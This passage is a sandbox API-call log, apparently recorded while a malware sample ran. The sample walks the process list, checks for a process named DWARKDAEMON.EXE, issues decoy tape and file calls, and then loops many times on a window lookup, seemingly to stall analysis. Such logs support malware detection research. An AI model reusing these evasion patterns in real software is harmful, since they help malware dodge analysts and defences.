lpString2="DWARKDAEMON.EXE") returned 1 [0163.529] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.529] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.529] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.529] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.529] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.530] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.530] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.530] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.530] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.530] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.530] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.533] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.533] lstrlenW (lpString="svchost.exe") returned 11 [0163.533] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.533] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.533] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.533] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.533] lstrlenW (lpString="svchost.exe") returned 11 [0163.533] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.533] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.533] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.534] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.534] lstrlenW (lpString="winpoint.exe") returned 12 [0163.534] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.534] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.534] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.535] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.535] lstrlenW (lpString="cmd.exe") returned 7 [0163.535] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.535] lstrcmpW (lpString1="CMD.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.535] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.536] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.536] lstrlenW (lpString="conhost.exe") returned 11 [0163.536] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.536] lstrcmpW (lpString1="CONHOST.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.536] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.536] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.536] lstrlenW (lpString="PING.EXE") returned 8 [0163.536] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.536] lstrcmpW (lpString1="PING.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.536] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.537] CloseHandle (hObject=0xe0) returned 1 [0163.537] PrepareTape (hDevice=0x0, dwOperation=0x0, bImmediate=0) returned 0x6 [0163.537] CreateFileA (lpFileName="*(JIGFODHy8t9ij3g89eiw" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\*(jigfodhy8t9ij3g89eiw"), dwDesiredAccess=0x0, dwShareMode=0x6, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.537] GetThreadLocale () returned 0x409 [0163.537] EraseTape (hDevice=0xffffffff, dwEraseType=0x17, bImmediate=1) returned 0x6 [0163.537] CreateCompatibleDC (hdc=0x7401083e) returned 0x0 [0163.537] GetACP () returned 0x4e4 [0163.537] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.538] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.538] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.538] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.539] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.539] GetACP () returned 0x4e4 [0163.539] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.540] GetACP () returned 0x4e4 [0163.540] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.540] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.541] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.541] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.541] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.542] GetACP () returned 0x4e4 [0163.542] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.542] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.543] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.543] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.543] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.544] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.544] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.544] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 